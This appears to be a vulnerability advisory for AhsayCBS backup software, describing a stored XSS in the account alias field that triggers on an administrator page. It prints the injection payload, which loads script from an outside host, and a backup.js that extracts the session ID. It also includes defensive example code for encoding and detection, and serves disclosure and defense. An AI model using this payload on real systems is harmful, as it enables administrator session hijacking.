Advisory

Upgrade to the latest version of Ahsay, currently 8.1.1.50 (https://www.ahsay.com/jsp/en/downloads/ahsay-downloads_latest-software_ahsaycbs.jsp)

Technical details

When creating an account, the “Alias/Display name” field is vulnerable to stored XSS. The XSS is triggered when an administrator visits the “Users, Groups & Policies” page. This stored XSS can be leveraged to steal the administrator's cookie, because the cookie is reflected in the HTML.

'><script src=https://www.wbsec.nl/ahsay/backup.js></script> 

backup.js:

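// Declared up front so the alert below does not throw if nothing is found.
var cookie;
try {
        // Walk every script element and look for a src URL containing "=".
        var scripts = document.getElementsByTagName("script");
        for (var i = 0; i < scripts.length; ++i) {
                var js = scripts[i].getAttribute("src").includes("=");
                if (js){
                        //console.debug(scripts[i]);
                        // Take the value that follows the first "=" in the src URL.
                        cookie = scripts[i].getAttribute("src").split("=")[1];
                        console.debug(cookie);
                }
        }
} catch (err) {
        //console.debug(err);
}
alert(document.URL + ": JSESSIONID=" + cookie);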

This results in grabbing the cookie, as shown below:

[Screenshot: Cookie reflected]
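A defender-side check for the two conditions described above (the unencoded alias and the session ID reflected in markup), added here as an example; it is not Ahsay's code or the advisory author's. The function names, the single-quoted attribute rendering and all sample values are assumptions constructed for illustration.

```javascript
// Added example: names and sample values are constructed, not Ahsay code.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode a user-controlled value for HTML text or a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Assumed rendering: the alias lands inside a single-quoted attribute,
// which is why a value starting with '> can close the tag.
function renderAliasField(alias, encode) {
  const shown = encode ? escapeHtml(alias) : alias;
  return "<input type='text' name='alias' value='" + shown + "'>";
}

// True when the rendered markup contains a script element.
function containsScriptElement(html) {
  return /<script\b/i.test(html);
}

// List every tag in server-rendered markup that carries the session ID.
function findSessionIdReflections(html, sessionId) {
  const hits = [];
  const tagRe = /<[^>]*>/g;
  let match;
  while ((match = tagRe.exec(html)) !== null) {
    if (match[0].includes(sessionId)) hits.push(match[0]);
  }
  return hits;
}

// Constructed inputs: an alias with the same shape as the advisory's payload,
// and a page that reflects a made-up session ID in a script src URL.
const SAMPLE_ALIAS = "'><script src=https://example.invalid/x.js></script>";
const SAMPLE_SESSION_ID = "CONSTRUCTED0123456789ABCDEF";
const SAMPLE_PAGE =
  "<html><head><script src=\"/constructed/app.js?sid=" + SAMPLE_SESSION_ID +
  "\"></script></head><body><p>Users</p></body></html>";

console.log("raw alias injects script:", containsScriptElement(renderAliasField(SAMPLE_ALIAS, false)));
console.log("encoded alias injects script:", containsScriptElement(renderAliasField(SAMPLE_ALIAS, true)));
console.log("session ID reflected in:", findSessionIdReflections(SAMPLE_PAGE, SAMPLE_SESSION_ID));
```

A non-empty result from findSessionIdReflections means the HttpOnly cookie flag alone does not protect the session, because any script running in the page can read the ID from the DOM.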